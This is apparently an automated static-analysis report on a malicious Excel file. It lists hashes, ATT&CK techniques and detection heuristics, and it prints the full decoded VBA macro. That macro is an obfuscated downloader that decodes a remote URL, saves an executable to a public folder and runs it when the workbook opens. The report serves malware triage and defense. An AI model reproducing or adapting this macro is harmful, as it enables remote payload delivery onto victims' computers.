Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 afc0ee35dd291d78…

MALICIOUS

Office (OLE)

Size: 778.0 KB
Created: 2014-05-06 06:56:25
Authoring application: Microsoft Excel
First seen: 2015-11-28
MD5: e17d03b09591d2044277401095894a97
SHA-1: 41c026881e513206343b20924f4f673dbf1371f5
SHA-256: afc0ee35dd291d784e4b81ee770d657339cd08071cdfb5ee38c74a4893c86501
Risk Score: 248

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter
  • T1105 Ingress Tool Transfer

This Excel document contains VBA macros, including a Workbook_Open macro, designed to lure the user into enabling content. The script uses ShellExecuteA and URLDownloadToFileA APIs, indicating an intent to download and execute a second-stage payload from a remote source. The obfuscated function names and API calls suggest a malicious downloader.

Heuristics 7

  • Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD)
    Matched line in script:
    Private Declare PtrSafe Function sodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETm Lib "urlmon" Alias "URLDownloadToFileA" (ByVal GZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJg As Long, ByVal CbSObrGcPYwrUWDWdlZFOPNSqwEivuKO As String, ByVal QIixpZHJeGLZVERrsScoQkOnFfFQKdLjS As String, ByVal djfrHWegpMHlnTZtBqVRRQVGNUl As Long, ByVal LKbQTLkNsqXMhXOcmUUIIjsEhAgDViVSM As Long) As Long
  • Workbook_Open macro (low, OLE_VBA_WBOPEN)
    Matched line in script:
    Private Sub Workbook_Open()
  • Reference to ShellExecute API (high, SC_STR_SHELLEXEC)
  • Suspicious extracted artifact (high, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4235 bytes
SHA-256: 8e7e3b9b02c4b7882aca003abda9cc75c9fbdaec17f0a9ddc808c9e9df9cee75
Detection
ClamAV: No threats found
Obfuscation or payload: likely
31 of 58 identifiers look randomly generated (e.g. 'GZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Welcome to My Macro
#If VBA7 Then
Private Declare PtrSafe Function GFNGhdrghsDFBDFgbdgF Lib "shell32" Alias "ShellExecuteA" (ByVal fczjtzvHXYuwFdKoDkqJRHniihmWPWBcNe As Long, ByVal hkcAeIsodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLM As String, ByVal VgbETmGZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXz As String, ByVal hykoOpAuMJgCbSObrGcPYwrUWDWdlZFOPN As String, ByVal SqwEivuKOQIixpZHJeGLZVERrsScoQkOnFfFQKdLjSdj As String, ByVal frHWegpMHlnTZtBqVRRQVGNUlLKbQTLkNsqXMhXOcmUUIIjs As Long) As Long
Private Declare PtrSafe Function sodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETm Lib "urlmon" Alias "URLDownloadToFileA" (ByVal GZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJg As Long, ByVal CbSObrGcPYwrUWDWdlZFOPNSqwEivuKO As String, ByVal QIixpZHJeGLZVERrsScoQkOnFfFQKdLjS As String, ByVal djfrHWegpMHlnTZtBqVRRQVGNUl As Long, ByVal LKbQTLkNsqXMhXOcmUUIIjsEhAgDViVSM As Long) As Long
#Else
Private Declare Function GFNGhdrghsDFBDFgbdgF Lib "shell32" Alias "ShellExecuteA" (ByVal fczjtzvHXYuwFdKoDkqJRHniihmWPWBcNe As Long, ByVal hkcAeIsodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLM As String, ByVal VgbETmGZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXz As String, ByVal hykoOpAuMJgCbSObrGcPYwrUWDWdlZFOPN As String, ByVal SqwEivuKOQIixpZHJeGLZVERrsScoQkOnFfFQKdLjSdj As String, ByVal frHWegpMHlnTZtBqVRRQVGNUlLKbQTLkNsqXMhXOcmUUIIjs As Long) As Long
Private Declare Function sodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETm Lib "urlmon" Alias "URLDownloadToFileA" (ByVal GZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJg As Long, ByVal CbSObrGcPYwrUWDWdlZFOPNSqwEivuKO As String, ByVal QIixpZHJeGLZVERrsScoQkOnFfFQKdLjS As String, ByVal djfrHWegpMHlnTZtBqVRRQVGNUl As Long, ByVal LKbQTLkNsqXMhXOcmUUIIjsEhAgDViVSM As Long) As Long
#End If
Dim kcAeIsodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETmG As String, ZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJg As String, CbSObrGcPYwrUWDWdlZFOP As String, ZVERrsScoQkOnFfFQKdLjSdjfrHWegpMHlnTZtB As String, qVRRQVGNUlLKbQTLkNsqXMhXOcmUUIIjs As String, EhAgDViVSMfczjtzvHXYuwFdKoDkqJRHniihmWPWB As String, HXYuwFdKoDkqJRHniihmWPWBcNehkcAeIsodxofsCmlYKmIU As String, jQiTXymkewtPlKPLXbqLMVgbETmGZUJpyzxCng As String
Private Function cNehkcAeIsodxofsCmlYKmIUjQ(iTXymkewtPlKPLXbqLMVgbETmGZUJpyzxCngn)
    Dim RfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbSObrGcPYw, rUWDWdlZFOPNSqwEivuKOQIixpZHJeGLZVERrsScoQ, kOnFfFQKdLjSdjfrHWegpMHlnTZtBqVRRQVGNU
y = Len(iTXymkewtPlKPLXbqLMVgbETmGZUJpyzxCngn)
For x = y To 3 - 2 Step 2 - 3
     nRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbS = Mid(iTXymkewtPlKPLXbqLMVgbETmGZUJpyzxCngn, x, 30 - 29)
     ObrGcPYwrUWDWdlZFOPNSqwEivuKOQIixpZHJ = ObrGcPYwrUWDWdlZFOPNSqwEivuKOQIixpZHJ & nRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbS
Next
 For rUWDWdlZFOPNSqwEivuKOQIixpZHJeGLZVERrsScoQ = 5 - 4 To Len(ObrGcPYwrUWDWdlZFOPNSqwEivuKOQIixpZHJ)
        RfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbSObrGcPYw = Mid(ObrGcPYwrUWDWdlZFOPNSqwEivuKOQIixpZHJ, rUWDWdlZFOPNSqwEivuKOQIixpZHJeGLZVERrsScoQ, 14 - 13)
        kOnFfFQKdLjSdjfrHWegpMHlnTZtBqVRRQVGNU = kOnFfFQKdLjSdjfrHWegpMHlnTZtBqVRRQVGNU & Chr(Asc(RfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbSObrGcPYw) - 7 + 6)
    Next
    cNehkcAeIsodxofsCmlYKmIUjQ = kOnFfFQKdLjSdjfrHWegpMHlnTZtBqVRRQVGNU
End Function
Private Sub NSqwEivuKOQIixpZHJeGL()
sodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETm 0, cNehkcAeIsodxofsCmlYKmIUjQ("fyf/qvuft020fnbo/dfebxop00;quui"), "C:\Users\Public\Documents" & "\" & cNehkcAeIsodxofsCmlYKmIUjQ("fyf/msuDfjcT"), 0, 0
GFNGhdrghsDFBDFgbdgF 0, "open", "C:\Users\Public\Documents" & "\" & cNehkcAeIsodxofsCmlYKmIUjQ("fyf/msuDfjcT"), "", vbNullString, vbNormalFocus
End Sub
Private Sub Workbook_Open()
NSqwEivuKOQIixpZHJeGL
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True